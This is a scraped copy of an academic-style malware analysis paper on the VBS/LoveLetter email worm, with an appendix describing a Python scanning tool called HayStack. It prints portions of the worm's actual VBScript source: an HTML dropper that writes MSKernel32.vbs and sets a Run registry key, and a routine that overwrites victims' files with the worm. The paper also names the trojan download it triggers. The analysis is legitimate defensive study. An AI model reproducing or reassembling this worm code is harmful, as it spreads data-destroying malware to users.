LoveLetter:A Targeted Analysis Using HeyStack

8/13/2019 LoveLetter:A Targeted Analysis Using HeyStack

http://slidepdf.com/reader/full/lovelettera-targeted-analysis-using-heystack 1/12

Hoggan 1/12

LoveLetter:A Targeted Analysis Using HeyStack

Written By: Rich Hoggan

Computer and Information Science, Notre Dame de Namur University

Abstract

Malware has become such a global threat to the internet community that malware analysis is

imperative towards understanding how to protect against it. This paper discusses the background of the

VBS/LoveLetter virus, and leads an analysis through it’s source code. Both manual passive analysis is

conducted against VBS/LoveLetter in addition to running HayStack -- a custom built analysis tool.

Area of Focus: Information Technology employees, Cybersecurity employees, Computer Scientists,

Cybersecurity enthusiasts, Reverse Engineers

Keywords: malware analysis, reverse engineering, cybersecurity, computer science

Introduction

From Brain to Flame, computer viruses have been a part of technology since the very beginning.

Viruses can be found in many programming languages and have targeted all major operating systems

which now include mobile operating systems. Even with anti-virus protection, the chances of being

infected and victimized by some type of malware continue to grow. Considering this staggering growth

in malware, malware analysis is a required tactic towards protecting against the various types of

malware that have gone from simply crashing a computer towards stealing private information and even

financial data.

In this paper we will be providing a brief background of the VBS/LoveLetter email worm. And

passive analysis of VBS/LoveLetter’s source code will take part during the rest of the paper. As such,

we will be looking at the key characteristics of the worm, analysing the programming language used to



Hoggan 2/12

write the worm, isolating the worm’s trigger and payload, and manually analyzing the source code’s

functionality. In addition to manual passive analysis, HayStack -- a custom built analysis tool -- will be

used to pull out information about the virus. This includes searching for registry keys and URL’s that

are referenced in the source code.

A Brief Background of VBS/LoveLetter

VBS/LoveLetter was released into the wild in May of 2000 and the first networks to show a

presence of the worm were in both Asia and Europe. It wouldn’t take long, however, for

VBS/LoveLetter to reach the United States as well as any of the other countries with a wired

infrastructure to the internet. Most notably, the virus managed to infect computers associated with the

Central Intelligence Agency and the Pentagon [1]. In addition to the quick propagation of the virus,

variants began spreading just as quickly. This was most likely due to the fact that the viruses source

code was available after its initial release.

Considering that the virus spread through email, the trigger was associated with an infected

email which contained an attachment called “LOVE-LETTER-FOR-YOU.TXT.vbs” to what users

thought was a love letter sent by someone in their Outlook address book. Once the user double clicked

the attachment, however, the virus executed thus causing an infection of the user’s machine which in turn

activated the self-propagation of the virus sending itself to everyone in the user’s Outlook as well as

iterating through each of the user’s directories in the file system searching for a number of different file

types. If any of these file types were found on the file system, they would be overwritten with the

viruses source code. At this point, the user would be infected with VBS/LoveLetter, and because the

virus over wrote files on the user’s file system, there would be no way to recover the original file. In

order to recover lost data, the user would needed to have an uninfected external backup. Reflecting this



Hoggan 3/12

outcome, some reports stated data loss reaching into the tens of thousands of dollars [2].

Passive Analysis

A Note on Laboratory Setup

Both manual and automated passive analysis was conducted on a Windows 8.1 machine

running Python 2.7 and the HayStack malware analysis tool.

Dissecting Virus Components

Programming Language Used

VBS/LoveLetter was written using the Microsoft VBS scripting language. While decreasing in

popularity due to languages such as Python, VBS has many facets which made it popular with IT and

system administrators as it could handle many types of automation tasks. Similarly, the VBS scripting

language is an interpreted language. This means that script files are interpreted line by line as opposed

to languages such as C where source code must be passed through a compiler in order to create an

executable file. Furthermore, VBS scripts execute once they are double clicked. This meant that when

users opened the infected email, or double clicked on any of the files that were infected in their file

system, the virus would execute. This was possible due to the fact that the Windows operating system

didn’t display file types automatically but also executed VBS files automatically. Even if the user was

more knowledgeable, there would be no way for the user to realize they were not opening up a web

page but executing a VBS file short of having file types displayed.

Payload and Trigger

The viruses trigger consisted of an infected email which consisted of the atached VBS script.

Essentially, this method of propagation worked because the actual file type was hidden from the user

making it look like a simple HTML file or webpage. Thus when the user opened the email attachment,

Hoggan 4/12

the VBS file executed instead. The trigger can be seen in figure 1.

[Figure 1 - HTML trigger generation] sub html

On Error Resume Next

dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6

dta1="<HTML><HEAD><TITLE>LOVELETTER - HTML<?-?TITLE><META

NAME=@-@Generator@-@ CONTENT=@-@BAROK VBS -

LOVELETTER@-@>"&vbcrlf& _ "<META NAME=@-@Author@-@ CONTENT=@-@spyder ?-?

[email protected] ?-?

@GRAMMERSoft Group ?-? Manila, Philippines ?-? March 2000@-@>"&vbcrlf& _

"<META NAME=@-@Description@-@

CONTENT=@-@simple but i think this is good...@-@>"&vbcrlf& _

"<?-?HEAD><BODY

ONMOUSEOUT=@[email protected]=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.

HTM#-#,#-#main#-#)@-@ "&vbcrlf& _

"ONKEYDOWN=@[email protected]=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.

HTM#-#,#-#main#-#)@-@

BGPROPERTIES=@-@fixed@-@ BGCOLOR=@-@#FF9933@-@>"&vbcrlf& _

"<CENTER><p>This HTML file need ActiveX Control<?-?p><p>To Enable to read

this HTML file<BR>- Please press #-#YES#-# button to

Enable ActiveX<?-?p>"&vbcrlf& _

"<?-?CENTER><MARQUEE LOOP=@-@infinite@-@

BGCOLOR=@-@yellow@-@>----------z--------------------z----------<?-?MARQU EE>

"&vbcrlf& _

"<?-?BODY><?-?HTML>"&vbcrlf& _

"<SCRIPT language=@-@JScript@-@>"&vbcrlf& _ ""&vbcrlf& _

"<?-?SCRIPT>"&vbcrlf& _ "<SCRIPT LANGUAGE=@-@VBScript@-@>"&vbcrlf& _ "<!--"&vbcrlf& _

"on error resume next"&vbcrlf& _

"dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit"&vbcrlf& _

"aw=1"&vbcrlf& _

"code="

dta2="set fso=CreateObject(@[email protected]@-@)"&vbcrlf& _

"set dirsystem=fso.GetSpecialFolder(1)"&vbcrlf& _

"code2=replace(code,chr(91)&chr(45)&chr(91),chr(39))"&vbcrlf& _

"code3=replace(code2,chr(93)&chr(45)&chr(93),chr(34))"&vbcrlf& _

"code4=replace(code3,chr(37)&chr(45)&chr(37),chr(92))"&vbcrlf& _ "set

wri=fso.CreateTextFile(dirsystem&@-@^-^MSKernel32.vbs@-@)"&vbcrlf& _

"wri.write code4"&vbcrlf& _

"wri.close"&vbcrlf& _ "if (fso.FileExists(dirsystem&@-@^-^MSKernel32.vbs@-@)) then"&vbcrlf& _ "if

(err.number=424) then"&vbcrlf& _

"aw=0"&vbcrlf& _

"end if"&vbcrlf& _

"if (aw=1) then"&vbcrlf& _

"document.write @-@ERROR: can#-#t initialize ActiveX@-@"&vbcrlf& _

"window.close"&vbcrlf& _

"end if"&vbcrlf& _



Hoggan 5/12

"end if"&vbcrlf& _

"Set regedit = CreateObject(@[email protected]@-@)"&vbcrlf& _

"regedit.RegWrite

@-@HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windows^-^CurrentVersion^

-^Run^-^MSKernel32@-@,dirsystem&@-@^-^MSKernel32.vbs@-@"&vbcrlf& _

"?-??-?-->"&vbcrlf& _

"<?-?SCRIPT>" dt1=replace(dta1,chr(35)&chr(45)&chr(35),"'")

dt1=replace(dt1,chr(64)&chr(45)&chr(64),"""")

dt4=replace(dt1,chr(63)&chr(45)&chr(63),"/")

dt5=replace(dt4,chr(94)&chr(45)&chr(94),"\")

dt2=replace(dta2,chr(35)&chr(45)&chr(35),"'")

dt2=replace(dt2,chr(64)&chr(45)&chr(64),"""")

dt3=replace(dt2,chr(63)&chr(45)&chr(63),"/")

dt6=replace(dt3,chr(94)&chr(45)&chr(94),"\")

set fso=CreateObject("Scripting.FileSystemObject")

set c=fso.OpenTextFile(WScript.ScriptFullName,1)

lines=Split(c.ReadAll,vbcrlf)

l1=ubound(lines)

for n=0 to ubound(lines) lines(n)=replace(lines(n),"'",chr(91)+chr(45)+chr(91))

lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))

lines(n)=replace(lines(n),"\",chr(37)+chr(45)+chr(37)) if (l1=n) then

lines(n)=chr(34)+lines(n)+chr(34)

else

lines(n)=chr(34)+lines(n)+chr(34)&"&vbcrlf& _" end if

next

set b=fso.CreateTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM") b.close

set d=fso.OpenTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM",2) d.write dt5

d.write join(lines,vbcrlf)

d.write vbcrlf

d.write dt6

d.close

end sub

Once the trigger was activated, the viruses payload was subsequently activated. The payload consisted

of iterating through the host file system, looking for numerous file types and overwriting them.

Everything from media files (.jpg, .jpeg, .mp3, .mp2), system files (.bat, .com, .ini), web files (.htm,

.html), and even source code files (.vbs, .cpp, c, h) were susceptible to the payload. The only caveat

being that MP3 files were hidden as opposed to overwritten [4]. Part of this code can be seen in figure

2.

[Figure 2 - part of the code that searches for files to overwrite]if (ext="vbs") or (ext="vbe") then

set ap=fso.OpenTextFile(f1.path,2,true)

ap.write vbscopy



Hoggan 6/12

ap.close

elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct")

or (ext="hta") then


ap.write vbscopy

ap.close

bname=fso.GetBaseName(f1.path) set cop=fso.GetFile(f1.path)

cop.copy(folderspec&"\"&bname&".vbs") fso.DeleteFile(f1.path)

elseif(ext="jpg") or (ext="jpeg") then


ap.write vbscopy

ap.close

set cop=fso.GetFile(f1.path)

cop.copy(f1.path&".vbs")

fso.DeleteFile(f1.path)

elseif(ext="mp3") or (ext="mp2") then

set mp3=fso.CreateTextFile(f1.path&".vbs")

mp3.write vbscopy

mp3.close set att=fso.GetFile(f1.path)

att.attributes=att.attributes+2

end if

Found Registry Keys

Running the registry key scan in HayStack brings back the following output.

[Figure 2 - HayStack registry key scan results]

Looking at figure 2, the virus makes an attempt to download an executable file called

“WIN-BUGSFIX.exe” into the Internet Explorer downloads directory. Without already knowing the

history of the VBS/LoveLetter virus, it could only be assumed that WIN-BUGSFIX.exe is just an

executable of some sort, however, suspicions would seem to indicate that it’s most likely an exterior

threat, most likely a trojan horse. Finally, correlations can be made between code in the virus and the



Hoggan 7/12

registry keys referencing MSKernel32.vbs and Win32DLL.vbs which are both system files to the

Windows operating system. In this case, however, the virus attempts to replace the actual system files

with its own source code due to the fact that these files have “.vbs” file extensions.

Found URL’s

Considering the suspicions formed from the previous scan, running the URL scan on the source

code furthers our suspicions about the potential trojan horse as there is now a URL associated with the

same executable file as shown in figure 3. In addition to the executable file, though, there is also a

domain name which when researched, indicates that server hosting the domain name, skyinet.net,

originates in Manila, Philippines. Researching this domain name also indicates that it’s also the domain

name for an Internet Service Provider or ISP in the Philippines. Once again, without not already

knowing the history of the virus, this information would seem to indicate a potential origin for the virus.

[Figure 3 - HayStack URL scan results]

Concluding Thoughts

While much of the information found about this virus has already been known for quite some

time, the exercise of analysing previously released malware helps in understanding how such viruses

execute on the host file system as well as what steps need to be taken in order to protect from data loss.



Hoggan 8/12

Considering VBS/LoveLetter, one of the most important steps victims could and should have taken was

maintain backups of their data as there was no way to recover infected data. Similarly, the ability for

the virus to execute its code automatically or without the user realizing code was going to execute was

another serious implication of the virus. This is why current versions of Windows provide a dialog box

when code such as a VBS file is going to execute. As such, maintaining the most recent anti-virus keys

for a particular anti-virus product is extremely important as well as never trusting an email attachment

unless it has been thoroughly scanned for viruses. Because malware is constantly growing in complexity

these tactics amongst others must become part of basic internet usage as it’s really one of the main lines

of defense.



Hoggan 9/12

Works Cited

[1]Zetter, Kim. "When Love Came to Town: A Virus Investigation." PCWorld . N.p., 13 Nov. 2000.

Web. 08 Oct. 2013.

[2]Crouch, Cameron. "Love Letter's Fallout Continues." PCWorld . N.p., 5 May 2000. Web. 08 Oct.

2013.



Hoggan 10/12

Appendix A - An Introduction to Using HayStack

Written By: Rich Hoggan

Notre Dame de Namur, Computer and Information Science

Introduction

HayStack was designed as a tool for analyzing malicious code. Instead of manually looking through a

malicious specimen, using HayStack, one is able to scan for particular information more efficiently.

HayStack was designed to conduct the following analysis:

String Scanning

Registry Key Scanning

Function Scanning

URL Scanning

When HayStack runs a particular scan against a malicious specimen, the software generates a report file

which details the results that were found. Similarly, if the particular scan does not come back with

positive scan results, a report file is still generated thus allowing a forensic examiner to build a case for

the type of malware being analyzed regardless of scan results.

Understanding HayStack’s Scanning Characteristics

String Scanning

String scanning is one of the simplest scans that HayStack runs against a malicious specimen in that it

simply looks for lines that include single and/or double quotes. If a line is found containing either of the

two, it’s stored and later sent to the command line as well as the report file. This can be seen in figure

1.

[Figure 1 - example of string scan]

Registry Key Scanning

Where as string scanning simply searches for lines containing single and double quotes, registry key

scanning goes a step further by looking for any of the common registry keys that might be referenced in

the malicious code. If a registry key is found, it is stored and passed to the command line as well as its



Hoggan 11/12

own report file. Figure 2 shows what this output might look like.

[Figure 2 - example of registry key scanning]

Function Scanning

Considering the fact that malicious specimens can be written in a variety of languages, it’s quite possible

that functions, methods, or sub-routines will have been written so as to facilitate functionality of the

malicious specimen. Now it should be pointed out, that the word function is not referring to the use of functions designed into the programming language, but the functions that were written using the

programming language, such as in the following listing.

[Listing 1 - example of a function, method, or sub-routine]

public void printHello()

System.out.println(“Hello World!”);

As such, HayStack scans for functions by looking for lines of code that contain the most typical function

prototype declarations in the most popular programming languages including VBScript, JavaScript,

Java, and C/C++. Similar to other types of scans produced by HayStack, this scan also generates its

own report tile. Lastly, the output of a function scan can be seen in figure 3.



Hoggan 12/12

[Figure 3 - example of function scan]

URL Scanning

The final scan conducted by HayStack is a URL scan. This scan essentially looks for any type of URL

which can be an indicator of an attempted downloading of an external threat such as a trojan horse or

similar other malicious specimen. As a result, these URLS are stored and passed to the command line

and custom report file when the scan completes. This can be seen in figure 4.

[Figure 4 - example of URL scan]

Future Development

Considering the fact that HayStack is still under development, there are many factors which need to be

considered across all of the scan types. These factors include:

What gets stored

What gets printed to the screen and the various report files

These factors should be taken into account during initial use, as they might produce false positives as

well as will change dramatically as development continues.

More so, HayStack runs as a command line application written in Python. A web application version of

the application is also in development which will allow for users to create accounts and scan malicious

code specimens using HayStack tools without requiring the use of the command line. Furthermore,

additional functionality requirements are being added to HayStack such that the tool will be able to

example executable files for URL’s and similar attributes including registry keys and operating systemfunction calls. This will also be developed as a standalone scan type in the command line version of the

tool.

LoveLetter:A Targeted Analysis Using HeyStack

Documents

Transcript of LoveLetter:A Targeted Analysis Using HeyStack